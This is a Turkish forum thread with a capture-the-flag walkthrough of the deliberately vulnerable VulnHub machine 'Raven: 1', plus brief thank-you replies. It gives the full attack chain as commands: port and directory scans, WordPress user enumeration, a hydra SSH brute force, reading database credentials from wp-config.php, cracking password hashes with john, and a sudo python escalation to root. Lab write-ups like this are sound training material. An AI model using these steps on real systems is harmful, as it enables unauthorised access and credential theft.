İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Raven: 1 Zafiyetli Makine Çözümü /qwx

02-12-2018 20:44
#1
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Siber Güvenlik Ekibi
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.505
Teşekkür (Etti):
77
Teşekkür (Aldı):
462
Konular:
52
Raven: 1 Zafiyetli Makine Çözümü
Raven:1 İndime Linki;
Kod:
https://www.vulnhub.com/entry/raven-1,256/

Açılışta makinemizin görüntüsü şu şekildedir.




İlk olarak IP taraması ile makinemizin çözümüne başlıyoruz.
Kod:
netdiscover





Sıra açık olan portları listelemekte.
Kod:
nmap <adress>





Hemen bir siteye göz atıyoruz.




Sitemiz açıldı bir çok uzantısı olduğunu görmekteyiz.İçerisinde neler bulunduğunu görmek için deniyoruz.




Bu siteler dışında herhangi bir dosya olup olmadığını kontrol etmek amacıyla dirb taraması gerçekleştireceğiz.Bir çok sonuç elde ettik fakat göze batan kısım buralar oldu.
Kod:
dirb http://<adress>





dirb taramasından aldığımız sonuç ile <adress>/wordpress/wp-admin/ 'e giriş sağlamayı deniyoruz bizi wp-login ekranı karşılıyor.




WordPress taraması uygulayacağız.Bu yöntem ile sitede açıklar tarayarak admin giriş bilgilerini bize listeleyecektir.steven ve michael bize çıkan sonuçlar arasında.İki seçenek içinde wp-login ekranında bilindik şifre kombinasyonlarını deneyince bir giriş sağlamadık.michael'in ağına bağlanmayı deniyoruz.
Kod:
wpscan --url http://<adress>/wordpress/ --wp-content-dir -ep -et -eu





Ardından SSH giriş için michael in şifresini brute force yöntemi ile bulacağız.
Not : rockyou.txt.gz default olarak sistemde bulunmaktadır dilerseniz başka bir wordlist.txt için dizin değiştirebilirsiniz.
Kod:
hydra -l michael -P /usr/share/wordlists/rockyou.txt.gz ssh://<adress>




ID ve Pass'ımız var artık SSH giriş yapabiliriz.
Not : Makineyi kapatıp tekrar açmam sonrası IP'si 192.168.1.4 olarak atanmıştır.


Kod:
ssh michael@<adress>michael



Evet karşımıza bir çok dosya çıkmaktadır ilk önce flag.txt'leri bulmak adına bir arama yapıyoruz.flag2.txt yi bulduk.
Kod:
find / -name "flag*.txt"

flag2'nin konumundan yola çıkarak wordpress'in dosyalarına da ulaşmış oluyoruz.
Kod:
cd /var
cd www
 cat flag2.txt
 cd html
 cd wordpress
 ls -ka



wp-config.php içini görüntüleyeceğiz şimdide.


Kod:
less wp-config.php
Çıkış için ise ; q 



ID ve Pass'ımızı aldık şimdide mysql veri tabanına giriş yapacağız ID : root Pass:
R@v3nSecurity Giriş yaptıktan sonra ilk olarak bizden databases seçmemiz isteniyor ardından kullanıcıların olduğu verileri listeliyoruz.



Kod:
mysql -u root -p
R@v3nSecurity
 show databases;
 use wordpress;
 show tables;
 select * from wp_users;



Evet karşımızda michael ve steven kullanıcı bilgileri çıkıyor ve karşıladınra şifreleri şifreleri md5 kırma sitesinde denediğimizde kırılmadığını farkettim onun için farklı bir yol deniyoruz.


Kod:
vim hash.txt
  $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
 $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
 :wq! john hash.txt
Ve şifremiz kırıldı.Şimdide elimizdeki ID ve Pass ile giriş sağlayacağız.




Sıra şimdi root yetkisi edinmekte.Ardından da flag bulmakta.


Kod:
su - steven
pink84
 /bin/bash -i
 sudo -l
 sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/sh")'


Ve başarılı bir şekilde makinemizin çözümüne ulaşmış olduk.
Kullanıcı İmzası
A hacker does for love what others would not do for money.

02-12-2018 20:46
#2
R4V3N - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2016
Nereden:
Antalya
Yaş:
21
Mesajlar:
5.810
Teşekkür (Etti):
681
Teşekkür (Aldı):
1991
Konular:
318
Eline sağlık başarılı bir çözüme benziyor, okuyacağım (yazmasam olmazdı bi etiket atmadığın kalmış ).
02-12-2018 20:49
#3
Qwx - ait Kullanıcı Resmi (Avatar)
Qwx
Siber Güvenlik Ekibi
Üyelik tarihi:
04/2012
Nereden:
İzmir
Mesajlar:
2.505
Teşekkür (Etti):
77
Teşekkür (Aldı):
462
Konular:
52
Alıntı:
R4V3N´isimli üyeden Alıntı Mesajı göster
Eline sağlık başarılı bir çözüme benziyor, okuyacağım (yazmasam olmazdı bi etiket atmadığın kalmış ).

Sızma testini yaparken sen geldin hep aklıma 2.'side var Ravenin Teşekkür ederim
Kullanıcı İmzası
A hacker does for love what others would not do for money.
02-12-2018 21:57
#4
R4V3N - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2016
Nereden:
Antalya
Yaş:
21
Mesajlar:
5.810
Teşekkür (Etti):
681
Teşekkür (Aldı):
1991
Konular:
318
Alıntı:
Qwx´isimli üyeden Alıntı Mesajı göster
Sızma testini yaparken sen geldin hep aklıma 2.'side var Ravenin Teşekkür ederim
Çok CTF ile ilgim var ya (: bi @ch_arli41 olamayız..
ch_arli41 Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı